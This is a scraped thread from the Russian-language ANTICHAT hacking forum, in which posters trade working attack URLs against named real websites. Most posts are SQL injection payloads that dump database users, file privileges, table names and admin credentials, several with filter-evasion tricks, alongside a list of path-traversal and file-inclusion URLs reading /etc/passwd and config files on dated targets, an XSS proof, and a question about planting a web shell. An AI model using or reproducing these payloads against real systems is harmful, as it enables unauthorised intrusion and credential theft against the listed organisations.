ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

02.10.2017, 10:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 1526
Репутация:
0
|
|
Сообщение от Печа
Печа said:
↑
Сайт:ene.com.tw
SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid
root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.
enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.
Эксплоит:
Код:
Code:
http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@version,load_file('/etc/passwd'),8,9,10 from mysql.user --+
Давно созрел вопрос, да только все никак руки не "доходили". Можно ли залить шелл вместо "load_file('/etc/passwd')"? Просто пока не понимаю, почему срабатывает php в SQL иньекции...
|
|
|
|

04.10.2017, 18:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 300820
Репутация:
90
|
|
|
|
|
|

06.10.2017, 10:09
|
|
Guest
Сообщений: n/a
Провел на форуме: 1526
Репутация:
0
|
|
Спасибо. Век живи, век учись.
|
|
|
|

11.10.2017, 10:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 192
Репутация:
3
|
|
Я кодинге не очень силен, но таковы правила форума и писать я могу только здесь. Помогите набрать 5 репутации
|
|
|
|

23.10.2017, 22:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.handelingsgerichtwerken.be/bestanden/download.php?id=69'+and+false+union select null,2,3,4,group_concat(0x202020,table_name,0x3c3e,column_name)+from information_schema.columns+where table_schema=database()+--+-[/COLOR][/COLOR]
|
|
|
|

28.12.2017, 20:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Код:
Code:
http://www.saifaiims.com/download.php?filename=../config/configuration.php
|
|
|
|

31.12.2017, 13:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 1224
Репутация:
0
|
|
Код:
Code:
http://www.baikap.de/index2.php?include=/etc/passwd&id=85&language=E|LFI|[DE] Germany|12/21/2017 05:38:42
http://www.avionews.it/index.php?corpo=/etc/passwd&news_id=1207340&pagina_chiamante=index.php|LFI|[IT] Italy|12/22/2017 06:51:05
https://drbl.org/management/techrpt.php?c=../../../../../etc/passwd&t=Start, restart or stop DRBL-related services|LFI|[JP] Japan|12/23/2017 06:10:26
http://caiana.caia.org.ar/template/caiana.php?pag=../../../../../etc/passwd&vol=3|LFI|[AR] Argentina|12/23/2017 08:47:59
http://www.energetica-india.net/download.php?seccion=articles&archivo=../../../../../../../../etc/passwd|LFI|[ES] Spain|12/23/2017 08:52:43
http://www.mcu.es/deportebase/cgi/um?M=/d7/f7&O=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00&N=&L=0|LFI|[ES] Spain|12/23/2017 09:00:57
https://www.txregionalcouncil.org/display.php?page=/etc/passwd|LFI|[US] United States|12/23/2017 09:10:58
http://www.basegroup.su/index.php?Page=http%3a%2f%2fwww.google.com|RFI|[RU] Russian Federation|12/23/2017 09:58:38
http://www.iatvt.ru/index.cgi?doc=../../../../../../etc/passwd%00|LFI|[RU] Russian Federation|12/23/2017 10:54:42
http://www.musifratz.de/content.php?seite=/etc/passwd&rubrik=kinderkultur&ansicht=projekte|LFI|[DE] Germany|12/23/2017 11:13:42
|
|
|
|

02.01.2018, 16:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.bpc.gov.bd/contactus.php?id=4439'+/*!12345UNiOn*/%0ASeLEct+1,2,/*!50000user()*/,4,5,6,7+--+_ [/COLOR][COLOR="#0000BB"]ebfashion[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]bd[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=-[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#DD0000"]'+UnIoN+SeLEcT+1,user(),2+--+- http://www.vertexhome.co.il/pageE.php?id=110+UnIon+SeLEct+1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema=database()+--+- http://foundation.sigmachi.org/station.php?id=wtg'[/COLOR][COLOR="#007700"]+and+[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]UnIon[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]0ASeLEct[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]+--+[/COLOR][COLOR="#0000BB"]_ http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.commongroundnews.org/article.php?id=-32240'+/*!12345UnIoN%0ASeLEcT*/+1,2,user(),4,(/*!12345SELECT*/+/*!12345GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+/*!50000INFORMATION_SCHEMA.TABLES*/+WHERE+TABLE_SCHEMA=DATABASE()),6,7,8,9,10,11,12,131,4,15,15,15,15,15,16,16,22+--+-&lan=ba&sp=1 [/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//oppodigital.in/product-details.php?id=9 and false UNiOn+SElEcT @,@,@,@,@,@,@,@,group_concat(table_name),@ from information_schema.tables # [/COLOR][/COLOR]
Код HTML:
HTML:
https://depositfiles.od.ua/tools/httpheaders.php

|
|
|
|

09.01.2018, 13:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 27718
Репутация:
0
|
|
Код HTML:
HTML:
http://www.tnla.com/events.php?id=38+UNION+SELECT+1,concat(username,password)+from+tnlacom_tnla.admin_users+--+
|
|
|
|

11.01.2018, 19:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 13195
Репутация:
3
|
|
Провайдер Электронный щит.
Локальная XSS.
Код:
Code:
http://wwwcom.ru/connect.php/%22%3E%3Cscript%3Ealert('Tayler(Mexel)')%3C/script%3E
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|